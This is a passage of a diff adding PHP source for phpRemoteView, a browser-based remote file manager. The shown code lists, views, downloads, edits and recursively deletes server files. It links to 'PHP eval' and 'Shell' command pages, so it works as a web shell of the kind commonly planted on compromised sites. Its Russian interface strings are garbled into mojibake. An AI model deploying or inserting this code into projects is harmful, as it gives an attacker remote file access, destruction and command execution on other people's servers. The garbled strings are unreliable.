+"Touch ok (set current time to 'modify time')"=>"Îáíîâëåíèå çàâåðøåíî (ôàéëó ïðèñâîåíî òåêóùåå âðåìÿ ìîäèôèêàöèè)",
+"Clean (empty file) cancel"=>"Î÷èùåíèå (îáíóëåíèå ôàéëà) îòìåíåíî",
+"Clean ok (file now empty)"=>"Îê, î÷èùåíî (ôàéë îáíóëåí)",
+"Wipe cancel - access denied"=>"Óíè÷òîæåíèå îòìåíåíî - äîñòóï çàïðåùåí",
+"Wipe ok (file deleted)"=>"Îê, óíè÷òîæåíî (è ôàéë ñòåðò)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"Óäàëåíèå âñåõ ôàéëîâ â",
+"skip"=>"ïðîïóñê",
+"deleting"=>"óäàëåíèå",
+"Deleting all dir/files (recursive) in"=>"Óäàëåíèå âñåõ ôàéëîâ/ïîäêàòàëîãîâ (ðåêóðñèâíî)",
+"DONE, go back"=>"ÃÎÒÎÂÎ, íàçàä",
+"DONE"=>"ÃÎÒÎÂÎ",
+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ðåäàêòèðîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïðåùåí",
+"EDIT FILE"=>"ÏÐÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêðûòü, äîñòóï çàïðåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕÐÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕÐÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïðåùåí",
+"for example, uncomment next line"=>"äëÿ ïðèìåðà, ðàñêîììåíòèðóéòå ñëåäóþùóþ ñòðîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïðèìåð (óäàëèòå êîììåíòàðèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ðàçìåð â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêðûòü êàòàëîã",
+"setup"=>"íàñòðîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáðîñèòü âñå íàñòðîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîðòèðîâêà",
+"Sort order"=>"Ïîðÿäîê ñîðòèðîâêè",
+"Ascending sort"=>"Ïî âîçðàñòàíèþ",
+"Descending sort"=>"Ïî óáûâàíèþ",
+"Sort by filename"=>"Ñîðòèðîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîðòèðîâàòü ïî ðàñøèðåíèþ ôàéëà",
+"Date/time format"=>"Ôîðìàò äàòû/âðåìåíè",
+"Panel font & size"=>"Øðèôò/ðàçìåð ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ðóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåðèòå øðèôò",
+"or type other"=>"èëè ââåäèòå äðóãîé",
+"Font size"=>"Ðàçìåð øðèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåðèðîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåðñàëüíûå êîíâåðòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ðàçìåð",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãðóïïà",
+'a'=>"Âëàäåëåö/Ãðóïïà",
+'c'=>"Ïðàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
